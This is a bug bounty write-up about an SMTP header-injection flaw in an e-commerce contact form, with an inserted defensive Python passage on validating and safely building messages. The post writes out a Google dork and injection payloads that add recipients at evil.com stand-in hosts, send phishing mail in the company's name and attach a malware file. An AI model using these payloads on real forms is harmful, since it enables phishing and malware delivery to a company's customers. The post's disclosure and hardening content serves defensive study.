How I Found an SMTP Injection Bug & Earned $800 in Just 30 Minutes!


TheIndianNetwork


Bug bounty hunting is full of surprises, and sometimes, the easiest vulnerabilities can pay the most. This is the story of how I stumbled upon an SMTP Injection bug, reported it, and earned $800 in just half an hour. I’ll also share the exact techniques, tools, and payloads I used so you can try it yourself!

Like any other day, I was doing reconnaissance, scanning for potential targets. I found a large e-commerce website that had an email-based contact form.

Here’s what I noticed:

- The contact form had fields for Name, Email, Subject, and Message.
- It sent an automated confirmation email once submitted.
- The email address I entered was reflected in the email body.

Immediately, my hacker instincts kicked in — what if the input was vulnerable to SMTP Injection?

To maximize my chances of finding vulnerabilities, I used the following reconnaissance techniques:

I used Google Dorking to find email-based contact forms:

inurl:/contact.php OR inurl:/feedback.php "email" site:target.com

Using Burp Suite, I intercepted the request and tested whether the email field was reflected in the response:

GET /contact?email=test@example.com HTTP/1.1
Host: target.com

If the email appeared in the response, it was a sign that my input was being passed through to the mail-sending code, which meant potential SMTP Injection or Email Spoofing was worth testing.

I submitted a normal test message to see what the email looked like. Then, I injected an SMTP payload into the email field:

victim@example.com
RCPT TO: attacker@evil.com

A few seconds later, I received two emails — one at my original email and another at my attacker-controlled email.

💡 Bingo! The server was accepting additional SMTP commands!

To check the severity, I tried a more advanced payload to manipulate the email structure and send messages on behalf of the company:

"attacker@example.com\nBCC: masslist@spam.com\nSubject: URGENT Security Alert!\nBody: Your account has been compromised. Click here to secure it: https://evil.com"

This spoofed an email that appeared to come directly from the company. If an attacker abused this, they could send phishing emails to thousands of customers!

I wanted to see if I could inject attachments into emails to increase the impact.

From: "support@target.com"\n
To: victim@example.com\n
Subject: Urgent Action Required\n
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

Your account is compromised! Click below to verify: https://evil.com
--XYZ
Content-Type: application/octet-stream; name="malware.exe"
Content-Disposition: attachment; filename="malware.exe"

[malicious binary content]
--XYZ--

This payload would attach a malware file to the email, making it a high-to-critical severity vulnerability.
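The root cause behind every payload above is a handler that splices form fields straight into the message header block, so a newline in the Email field becomes a new header such as BCC or a second Subject. The following is an added illustration, not code from the author or the affected site: a hypothetical vulnerable builder beside a hardened one, plus a parser that reads the result the way a mail server would, so the injected headers are visible. All function names, the sample address and the support@target.example sender are assumptions.

```python
import re
from email.message import EmailMessage
from email.parser import Parser

# Constructed sample input: the header-injection payload quoted in the write-up above.
INJECTED_EMAIL = "attacker@example.com\nBCC: masslist@spam.com\nSubject: URGENT Security Alert!"

def vulnerable_build(name: str, email: str, subject: str, body: str) -> str:
    """Hypothetical vulnerable handler: form fields are concatenated straight
    into the header block, so a newline inside a field starts a new header."""
    return (f"From: support@target.example\r\nTo: {email}\r\nSubject: {subject}\r\n"
            f"\r\nHello {name},\r\n{body}\r\n")

def parse_headers(raw: str) -> dict:
    """Parse a raw message the way an MTA would; returns name -> list of values.
    Duplicates are kept, which is exactly how an injected BCC or second Subject shows up."""
    msg = Parser().parsestr(raw)
    return {name.lower(): msg.get_all(name) for name in msg.keys()}

_HEADER_INJECTION = re.compile(r"[\r\n\x00]")           # CR, LF or NUL can never be legitimate
_ADDR = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")

def validate_contact_form(fields: dict) -> list:
    """Return the names of fields that must be rejected: any CR/LF/NUL in a value
    destined for a header, or an email that is not one single bare address."""
    bad = [k for k, v in fields.items() if _HEADER_INJECTION.search(v)]
    if "email" in fields and "email" not in bad and not _ADDR.fullmatch(fields["email"]):
        bad.append("email")
    return bad

def safe_build(name: str, email: str, subject: str, body: str) -> str:
    """Hardened handler: reject injection attempts up front, then let the email
    library assemble the message so user data can never become a header line."""
    bad = validate_contact_form({"name": name, "email": email, "subject": subject})
    if bad:
        raise ValueError(f"rejected contact form fields: {bad}")
    msg = EmailMessage()
    msg["From"] = "support@target.example"
    msg["To"] = email            # validated single address
    msg["Subject"] = subject     # no CR/LF, so it stays one header
    msg.set_content(f"Hello {name},\n{body}")
    return msg.as_string()
```

Logging the rejected field names from validate_contact_form gives a cheap detection signal: a contact form that never legitimately receives CR/LF in its Email field will only trigger it on probing like the one described in this write-up.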

I quickly drafted a professional report and submitted it to their bug bounty program on HackerOne.

- Vulnerability: SMTP Injection in Contact Form
- Impact: Allows email spoofing, phishing, unauthorized email sending, and malware injection
- Steps to Reproduce: Provided multiple payloads and email logs
- Proof of Concept Video: Attached a screen recording showing real-time exploitation

Within 30 minutes, I got a response from their security team:

🚀 “We have verified the issue and marked it as HIGH severity. Expect a payout soon.”

A day later, I received $800 in my HackerOne account! 🎉

- Always check email-based forms — They are often vulnerable to SMTP Injection.
- Try multiple payloads — Even if a basic test fails, an advanced payload might work.
- Increase impact — Companies pay more for vulnerabilities that pose real-world threats.
- Bug bounty is about creativity — Sometimes, simple bugs turn into big rewards.
- SMTP Injection can escalate — By injecting attachments, you can turn a medium bug into a critical one.

📖 Medium Blog: TheIndianNetwork
📺 YouTube Channel: TheIndianNetwork
📧 Email: theindiannetwork@protonmail.com

💰 Go hunt, find a bug, and make money today!
